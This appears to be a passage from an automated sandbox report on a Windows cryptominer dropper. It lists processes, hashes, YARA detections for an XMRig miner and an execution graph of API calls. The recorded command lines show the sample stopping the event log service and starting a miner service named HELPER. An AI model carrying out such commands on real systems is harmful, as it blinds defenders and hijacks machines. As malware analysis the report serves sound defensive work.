                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:12:44:56
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                    Imagebase:0x7ff6ec9a0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                    Target ID:7
                                                    Start time:12:44:56
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe start "HELPER"
                                                    Imagebase:0x7ff6ec9a0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                    Target ID:8
                                                    Start time:12:44:56
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff62fc20000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:12:44:56
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff62fc20000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:12:44:56
                                                    Start date:11/03/2025
                                                    Path:C:\ProgramData\helper\helper.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\ProgramData\helper\helper.exe
                                                    Imagebase:0x7ff734aa0000
                                                    File size:7'113'728 bytes
                                                    MD5 hash:8BBC3CCA3905E7ADA419A806DE48006C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                    • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 76%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:12:44:56
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe
                                                    Imagebase:0x7ff62fc20000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:12
                                                    Start time:12:44:56
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:svchost.exe
                                                    Imagebase:0x7ff6ca680000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000003.1252525883.00000239B6669000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2458097083.00000239B6645000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2457693680.00000239B5E24000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2457793221.00000239B5E81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2458192691.00000239B6673000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2457763059.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000003.1213867902.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000003.1252371829.00000239B6669000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2455424304.0000000140360000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000C.00000002.2455424304.0000000140360000.00000002.00000001.00020000.00000000.sdmp, Author: unknown
                                                    Has exited:false

                                                    Target ID:13
                                                    Start time:12:45:01
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                    Imagebase:0x7ff6ca680000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:12:45:01
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                    Imagebase:0x7ff75f3c0000
                                                    File size:329'504 bytes
                                                    MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:15
                                                    Start time:12:45:01
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                    Imagebase:0x7ff6ca680000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:16
                                                    Start time:12:45:03
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                    Imagebase:0x7ff6ca680000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                    Target ID:17
                                                    Start time:12:45:03
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                    Imagebase:0x7ff6ca680000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:19
                                                    Start time:12:46:04
                                                    Start date:11/03/2025
                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                    Imagebase:0x7ff6732f0000
                                                    File size:468'120 bytes
                                                    MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:12:46:04
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff62fc20000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Executed Functions

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1211243969.00007FF72E5F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72E5F0000, based on PE: true
                                                    • Associated: 00000001.00000002.1211208845.00007FF72E5F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000001.00000002.1211286651.00007FF72E5F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000001.00000002.1211310015.00007FF72E5FA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000001.00000002.1211338956.00007FF72E5FB000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000001.00000002.1211879955.00007FF72ECB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000001.00000002.1211902360.00007FF72ECBB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ff72e5f0000_nbtypsfikkad.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9cd7bb3e11cd21f6f95139e897f2649237030b9c17f3d106d66d6169921902ff
                                                    • Instruction ID: b9649db4e9d77d179773e11533886d32e010f0bfacf6f4e77cef5fba491da058
                                                    • Opcode Fuzzy Hash: 9cd7bb3e11cd21f6f95139e897f2649237030b9c17f3d106d66d6169921902ff
                                                    • Instruction Fuzzy Hash: 2FB01231D2430984E7003F03DC513587260EB0A740FD00034C40C03353CEBE64404F30

                                                    Executed Functions

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1214321826.00007FF734AA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF734AA0000, based on PE: true
                                                    • Associated: 0000000A.00000002.1214306939.00007FF734AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 0000000A.00000002.1214336270.00007FF734AA8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 0000000A.00000002.1214352483.00007FF734AAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 0000000A.00000002.1215290970.00007FF73516B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ff734aa0000_helper.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9cd7bb3e11cd21f6f95139e897f2649237030b9c17f3d106d66d6169921902ff
                                                    • Instruction ID: 69b82ab668bf4959b03e78f7fe67e6ef9192bf4b27aec4eb5ecdd3dc7e02f5ea
                                                    • Opcode Fuzzy Hash: 9cd7bb3e11cd21f6f95139e897f2649237030b9c17f3d106d66d6169921902ff
                                                    • Instruction Fuzzy Hash: 2BB01236D05309A4F3083F03D8C1758B2606B08740FE00034C60C43353DEBD50405BB0

                                                    Execution Graph

                                                    Execution Coverage

                                                    Dynamic/Packed Code Coverage

                                                    Signature Coverage

                                                    Execution Coverage:2.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:11.3%
                                                    Total number of Nodes:859
                                                    Total number of Limit Nodes:2
                                                    Show Legend
                                                    Hide Nodes/Edges
                                                    execution_graph 2830 140001ac3 2831 140001a70 2830->2831 2832 14000199e 2831->2832 2833 140001b36 2831->2833 2837 140001b53 2831->2837 2835 140001a0f 2832->2835 2836 1400019e9 VirtualProtect 2832->2836 2834 140001ba0 4 API calls 2833->2834 2834->2837 2836->2832 1973 140001ae4 1974 140001a70 1973->1974 1975 14000199e 1974->1975 1976 140001b36 1974->1976 1979 140001b53 1974->1979 1978 140001a0f 1975->1978 1980 1400019e9 VirtualProtect 1975->1980 1981 140001ba0 1976->1981 1980->1975 1984 140001bc2 1981->1984 1982 140001c04 memcpy 1982->1979 1984->1982 1985 140001c45 VirtualQuery 1984->1985 1986 140001cf4 1984->1986 1985->1986 1990 140001c72 1985->1990 1987 140001d23 GetLastError 1986->1987 1989 140001d37 1987->1989 1988 140001ca4 VirtualProtect 1988->1982 1988->1987 1990->1982 1990->1988 2018 140001404 2091 140001394 2018->2091 2020 140001413 2021 140001394 2 API calls 2020->2021 2022 140001422 2021->2022 2023 140001394 2 API calls 2022->2023 2024 140001431 2023->2024 2025 140001394 2 API calls 2024->2025 2026 140001440 2025->2026 2027 140001394 2 API calls 2026->2027 2028 14000144f 2027->2028 2029 140001394 2 API calls 2028->2029 2030 14000145e 2029->2030 2031 140001394 2 API calls 2030->2031 2032 14000146d 2031->2032 2033 140001394 2 API calls 2032->2033 2034 14000147c 2033->2034 2035 140001394 2 API calls 2034->2035 2036 14000148b 2035->2036 2037 140001394 2 API calls 2036->2037 2038 14000149a 2037->2038 2039 140001394 2 API calls 2038->2039 2040 1400014a9 2039->2040 2041 140001394 2 API calls 2040->2041 2042 1400014b8 2041->2042 2043 140001394 2 API calls 2042->2043 2044 1400014c7 2043->2044 2045 140001394 2 API calls 2044->2045 2046 1400014d6 2045->2046 2047 1400014e5 2046->2047 2048 140001394 2 API calls 2046->2048 2049 140001394 2 API calls 2047->2049 2048->2047 2050 1400014ef 2049->2050 2051 1400014f4 2050->2051 2052 140001394 2 API calls 2050->2052 2053 140001394 2 API calls 2051->2053 2052->2051 2054 1400014fe 2053->2054 2055 140001503 2054->2055 2056 140001394 2 API calls 2054->2056 2057 140001394 2 API calls 2055->2057 2056->2055 2058 14000150d 2057->2058 2059 140001394 2 API calls 2058->2059 2060 140001512 2059->2060 2061 140001394 2 API calls 2060->2061 2062 140001521 2061->2062 2063 140001394 2 API calls 2062->2063 2064 140001530 2063->2064 2065 140001394 2 API calls 2064->2065 2066 14000153f 2065->2066 2067 140001394 2 API calls 2066->2067 2068 14000154e 2067->2068 2069 140001394 2 API calls 2068->2069 2070 14000155d 2069->2070 2071 140001394 2 API calls 2070->2071 2072 14000156c 2071->2072 2073 140001394 2 API calls 2072->2073 2074 14000157b 2073->2074 2075 140001394 2 API calls 2074->2075 2076 14000158a 2075->2076 2077 140001394 2 API calls 2076->2077 2078 140001599 2077->2078 2079 140001394 2 API calls 2078->2079 2080 1400015a8 2079->2080 2081 140001394 2 API calls 2080->2081 2082 1400015b7 2081->2082 2083 140001394 2 API calls 2082->2083 2084 1400015c6 2083->2084 2085 140001394 2 API calls 2084->2085 2086 1400015d5 2085->2086 2087 140001394 2 API calls 2086->2087 2088 1400015e4 2087->2088 2089 140001394 2 API calls 2088->2089 2090 1400015f3 2089->2090 2092 140005790 malloc 2091->2092 2093 1400013b8 2092->2093 2094 1400013c6 NtSetInformationWorkerFactory 2093->2094 2094->2020 2095 140002104 2096 140002111 EnterCriticalSection 2095->2096 2101 140002218 2095->2101 2097 14000220b LeaveCriticalSection 2096->2097 2103 14000212e 2096->2103 2097->2101 2098 140002272 2099 14000214d TlsGetValue GetLastError 2099->2103 2100 140002241 DeleteCriticalSection 2100->2098 2101->2098 2101->2100 2102 140002230 free 2101->2102 2102->2100 2102->2102 2103->2097 2103->2099 1991 140001e65 1992 140001e67 signal 1991->1992 1993 140001e7c 1992->1993 1995 140001e99 1992->1995 1994 140001e82 signal 1993->1994 1993->1995 1994->1995 2838 140001f47 2839 140001e67 signal 2838->2839 2842 140001e99 2838->2842 2840 140001e7c 2839->2840 2839->2842 2841 140001e82 signal 2840->2841 2840->2842 2841->2842 1996 14000216f 1997 140002185 1996->1997 1998 140002178 InitializeCriticalSection 1996->1998 1998->1997 1999 140001a70 2000 14000199e 1999->2000 2003 140001a7d 1999->2003 2001 140001a0f 2000->2001 2002 1400019e9 VirtualProtect 2000->2002 2002->2000 2003->1999 2004 140001b36 2003->2004 2006 140001b53 2003->2006 2005 140001ba0 4 API calls 2004->2005 2005->2006 2104 140001e10 2105 140001e2f 2104->2105 2106 140001ecc 2105->2106 2110 140001eb5 2105->2110 2111 140001e55 2105->2111 2107 140001ed3 signal 2106->2107 2106->2110 2108 140001ee4 2107->2108 2107->2110 2109 140001eea signal 2108->2109 2108->2110 2109->2110 2111->2110 2112 140001f12 signal 2111->2112 2112->2110 2843 140002050 2844 14000205e EnterCriticalSection 2843->2844 2845 1400020cf 2843->2845 2846 1400020c2 LeaveCriticalSection 2844->2846 2847 140002079 2844->2847 2846->2845 2847->2846 2848 1400020bd free 2847->2848 2848->2846 2849 140001fd0 2850 140001fe4 2849->2850 2851 140002033 2849->2851 2850->2851 2852 140001ffd EnterCriticalSection LeaveCriticalSection 2850->2852 2852->2851 2121 140001ab3 2122 140001a70 2121->2122 2122->2121 2123 14000199e 2122->2123 2124 140001b36 2122->2124 2127 140001b53 2122->2127 2126 140001a0f 2123->2126 2128 1400019e9 VirtualProtect 2123->2128 2125 140001ba0 4 API calls 2124->2125 2125->2127 2128->2123 1963 140001394 1967 140005790 1963->1967 1965 1400013b8 1966 1400013c6 NtSetInformationWorkerFactory 1965->1966 1968 1400057ae 1967->1968 1971 1400057db 1967->1971 1968->1965 1969 140005883 1970 14000589f malloc 1969->1970 1972 1400058c0 1970->1972 1971->1968 1971->1969 1972->1968 2113 14000219e 2114 140002272 2113->2114 2115 1400021ab EnterCriticalSection 2113->2115 2116 140002265 LeaveCriticalSection 2115->2116 2118 1400021c8 2115->2118 2116->2114 2117 1400021e9 TlsGetValue GetLastError 2117->2118 2118->2116 2118->2117 2007 140001000 2008 14000108b __set_app_type 2007->2008 2009 140001040 2007->2009 2011 1400010b6 2008->2011 2009->2008 2010 1400010e5 2011->2010 2013 140001e00 2011->2013 2014 140005d20 __setusermatherr 2013->2014 2015 140001800 2016 140001812 2015->2016 2017 140001835 fprintf 2016->2017 2119 140002320 strlen 2120 140002337 2119->2120 2129 140001140 2132 140001160 2129->2132 2131 140001156 2133 1400011b9 2132->2133 2134 14000118b 2132->2134 2135 1400011d3 2133->2135 2136 1400011c7 _amsg_exit 2133->2136 2134->2133 2137 1400011a0 Sleep 2134->2137 2138 140001201 _initterm 2135->2138 2139 14000121a 2135->2139 2136->2135 2137->2133 2137->2134 2138->2139 2155 140001880 2139->2155 2142 14000126a 2143 14000126f malloc 2142->2143 2144 14000128b 2143->2144 2146 1400012d0 2143->2146 2145 1400012a0 strlen malloc memcpy 2144->2145 2145->2145 2145->2146 2166 140003150 2146->2166 2148 140001315 2149 140001344 2148->2149 2150 140001324 2148->2150 2153 140001160 66 API calls 2149->2153 2151 140001338 2150->2151 2152 14000132d _cexit 2150->2152 2151->2131 2152->2151 2154 140001366 2153->2154 2154->2131 2156 140001247 SetUnhandledExceptionFilter 2155->2156 2157 1400018a2 2155->2157 2156->2142 2157->2156 2158 14000194d 2157->2158 2162 140001a20 2157->2162 2159 14000199e 2158->2159 2160 140001ba0 4 API calls 2158->2160 2159->2156 2161 1400019e9 VirtualProtect 2159->2161 2160->2158 2161->2159 2162->2159 2163 140001b36 2162->2163 2165 140001b53 2162->2165 2164 140001ba0 4 API calls 2163->2164 2164->2165 2169 140003166 2166->2169 2167 1400032b8 wcslen 2250 14000153f 2167->2250 2169->2167 2171 1400034ae 2171->2148 2174 1400033b3 2177 1400033d9 memset 2174->2177 2180 14000340b 2177->2180 2179 14000345b wcslen 2181 140003471 2179->2181 2185 1400034ac 2179->2185 2180->2179 2182 140003480 _wcsnicmp 2181->2182 2183 140003496 wcslen 2182->2183 2182->2185 2183->2182 2183->2185 2184 140003571 wcscpy wcscat memset 2187 1400035b0 2184->2187 2185->2184 2186 1400035f3 wcscpy wcscat memset 2188 140003636 2186->2188 2187->2186 2189 14000373e wcscpy wcscat memset 2188->2189 2190 140003780 2189->2190 2191 140003ad5 wcslen 2190->2191 2192 140003ae3 2191->2192 2196 140003b1b 2191->2196 2193 140003af0 _wcsnicmp 2192->2193 2194 140003b06 wcslen 2193->2194 2193->2196 2194->2193 2194->2196 2195 140003bad wcscpy wcscat memset 2197 140003bef 2195->2197 2196->2195 2198 140003c32 wcscpy wcscat memset 2197->2198 2199 140003c78 2198->2199 2200 140003ca8 wcscpy wcscat memset 2199->2200 2202 140003cfc 2200->2202 2201 140003d41 wcscpy wcscat wcslen 2390 14000146d 2201->2390 2202->2201 2205 140003ef6 2210 140003fa7 memset 2205->2210 2208 140003f87 2212 14000145e 2 API calls 2208->2212 2209 140003e5e 2476 1400014a9 2209->2476 2213 1400054a7 2210->2213 2214 140003fcb wcscpy wcscat wcslen 2210->2214 2212->2205 2239 1400040f0 2214->2239 2217 140003f76 2219 14000145e 2 API calls 2217->2219 2219->2205 2222 140003eea 2224 14000145e 2 API calls 2222->2224 2223 1400041de wcslen 2225 14000153f 2 API calls 2223->2225 2224->2205 2225->2239 2226 14000461d wcslen 2228 14000153f 2 API calls 2226->2228 2227 1400043aa wcslen 2637 14000157b 2227->2637 2228->2239 2230 14000145e NtSetInformationWorkerFactory malloc 2230->2239 2231 140004438 memset 2231->2239 2232 1400044a2 wcslen 2654 1400015a8 2232->2654 2235 14000522f memcpy 2235->2239 2236 14000450a _wcsnicmp 2236->2239 2237 140004b1d memset 2238 140004d30 memset 2237->2238 2237->2239 2238->2239 2239->2223 2239->2226 2239->2227 2239->2230 2239->2231 2239->2232 2239->2235 2239->2236 2239->2237 2239->2238 2240 140004f7d wcslen 2239->2240 2242 140004b8b memset 2239->2242 2243 140004d8e wcscpy wcscat wcslen 2239->2243 2245 140004be5 wcscpy wcscat wcslen 2239->2245 2248 140004ed2 2239->2248 2249 1400026e0 11 API calls 2239->2249 2592 1400014d6 2239->2592 2665 140001521 2239->2665 2763 140001431 2239->2763 2241 1400015a8 2 API calls 2240->2241 2241->2239 2242->2239 2244 140001422 2 API calls 2243->2244 2244->2239 2694 140001422 2245->2694 2248->2148 2249->2239 2251 140001394 2 API calls 2250->2251 2252 14000154e 2251->2252 2253 140001394 2 API calls 2252->2253 2254 14000155d 2253->2254 2255 140001394 2 API calls 2254->2255 2256 14000156c 2255->2256 2257 140001394 2 API calls 2256->2257 2258 14000157b 2257->2258 2259 140001394 2 API calls 2258->2259 2260 14000158a 2259->2260 2261 140001394 2 API calls 2260->2261 2262 140001599 2261->2262 2263 140001394 2 API calls 2262->2263 2264 1400015a8 2263->2264 2265 140001394 2 API calls 2264->2265 2266 1400015b7 2265->2266 2267 140001394 2 API calls 2266->2267 2268 1400015c6 2267->2268 2269 140001394 2 API calls 2268->2269 2270 1400015d5 2269->2270 2271 140001394 2 API calls 2270->2271 2272 1400015e4 2271->2272 2273 140001394 2 API calls 2272->2273 2274 1400015f3 2273->2274 2274->2171 2275 140001503 2274->2275 2276 140001394 2 API calls 2275->2276 2277 14000150d 2276->2277 2278 140001394 2 API calls 2277->2278 2279 140001512 2278->2279 2280 140001394 2 API calls 2279->2280 2281 140001521 2280->2281 2282 140001394 2 API calls 2281->2282 2283 140001530 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000153f 2284->2285 2286 140001394 2 API calls 2285->2286 2287 14000154e 2286->2287 2288 140001394 2 API calls 2287->2288 2289 14000155d 2288->2289 2290 140001394 2 API calls 2289->2290 2291 14000156c 2290->2291 2292 140001394 2 API calls 2291->2292 2293 14000157b 2292->2293 2294 140001394 2 API calls 2293->2294 2295 14000158a 2294->2295 2296 140001394 2 API calls 2295->2296 2297 140001599 2296->2297 2298 140001394 2 API calls 2297->2298 2299 1400015a8 2298->2299 2300 140001394 2 API calls 2299->2300 2301 1400015b7 2300->2301 2302 140001394 2 API calls 2301->2302 2303 1400015c6 2302->2303 2304 140001394 2 API calls 2303->2304 2305 1400015d5 2304->2305 2306 140001394 2 API calls 2305->2306 2307 1400015e4 2306->2307 2308 140001394 2 API calls 2307->2308 2309 1400015f3 2308->2309 2309->2174 2310 14000156c 2309->2310 2311 140001394 2 API calls 2310->2311 2312 14000157b 2311->2312 2313 140001394 2 API calls 2312->2313 2314 14000158a 2313->2314 2315 140001394 2 API calls 2314->2315 2316 140001599 2315->2316 2317 140001394 2 API calls 2316->2317 2318 1400015a8 2317->2318 2319 140001394 2 API calls 2318->2319 2320 1400015b7 2319->2320 2321 140001394 2 API calls 2320->2321 2322 1400015c6 2321->2322 2323 140001394 2 API calls 2322->2323 2324 1400015d5 2323->2324 2325 140001394 2 API calls 2324->2325 2326 1400015e4 2325->2326 2327 140001394 2 API calls 2326->2327 2328 1400015f3 2327->2328 2328->2174 2329 14000145e 2328->2329 2330 140001394 2 API calls 2329->2330 2331 14000146d 2330->2331 2332 140001394 2 API calls 2331->2332 2333 14000147c 2332->2333 2334 140001394 2 API calls 2333->2334 2335 14000148b 2334->2335 2336 140001394 2 API calls 2335->2336 2337 14000149a 2336->2337 2338 140001394 2 API calls 2337->2338 2339 1400014a9 2338->2339 2340 140001394 2 API calls 2339->2340 2341 1400014b8 2340->2341 2342 140001394 2 API calls 2341->2342 2343 1400014c7 2342->2343 2344 140001394 2 API calls 2343->2344 2345 1400014d6 2344->2345 2346 1400014e5 2345->2346 2347 140001394 2 API calls 2345->2347 2348 140001394 2 API calls 2346->2348 2347->2346 2349 1400014ef 2348->2349 2350 1400014f4 2349->2350 2351 140001394 2 API calls 2349->2351 2352 140001394 2 API calls 2350->2352 2351->2350 2353 1400014fe 2352->2353 2354 140001503 2353->2354 2355 140001394 2 API calls 2353->2355 2356 140001394 2 API calls 2354->2356 2355->2354 2357 14000150d 2356->2357 2358 140001394 2 API calls 2357->2358 2359 140001512 2358->2359 2360 140001394 2 API calls 2359->2360 2361 140001521 2360->2361 2362 140001394 2 API calls 2361->2362 2363 140001530 2362->2363 2364 140001394 2 API calls 2363->2364 2365 14000153f 2364->2365 2366 140001394 2 API calls 2365->2366 2367 14000154e 2366->2367 2368 140001394 2 API calls 2367->2368 2369 14000155d 2368->2369 2370 140001394 2 API calls 2369->2370 2371 14000156c 2370->2371 2372 140001394 2 API calls 2371->2372 2373 14000157b 2372->2373 2374 140001394 2 API calls 2373->2374 2375 14000158a 2374->2375 2376 140001394 2 API calls 2375->2376 2377 140001599 2376->2377 2378 140001394 2 API calls 2377->2378 2379 1400015a8 2378->2379 2380 140001394 2 API calls 2379->2380 2381 1400015b7 2380->2381 2382 140001394 2 API calls 2381->2382 2383 1400015c6 2382->2383 2384 140001394 2 API calls 2383->2384 2385 1400015d5 2384->2385 2386 140001394 2 API calls 2385->2386 2387 1400015e4 2386->2387 2388 140001394 2 API calls 2387->2388 2389 1400015f3 2388->2389 2389->2174 2391 140001394 2 API calls 2390->2391 2392 14000147c 2391->2392 2393 140001394 2 API calls 2392->2393 2394 14000148b 2393->2394 2395 140001394 2 API calls 2394->2395 2396 14000149a 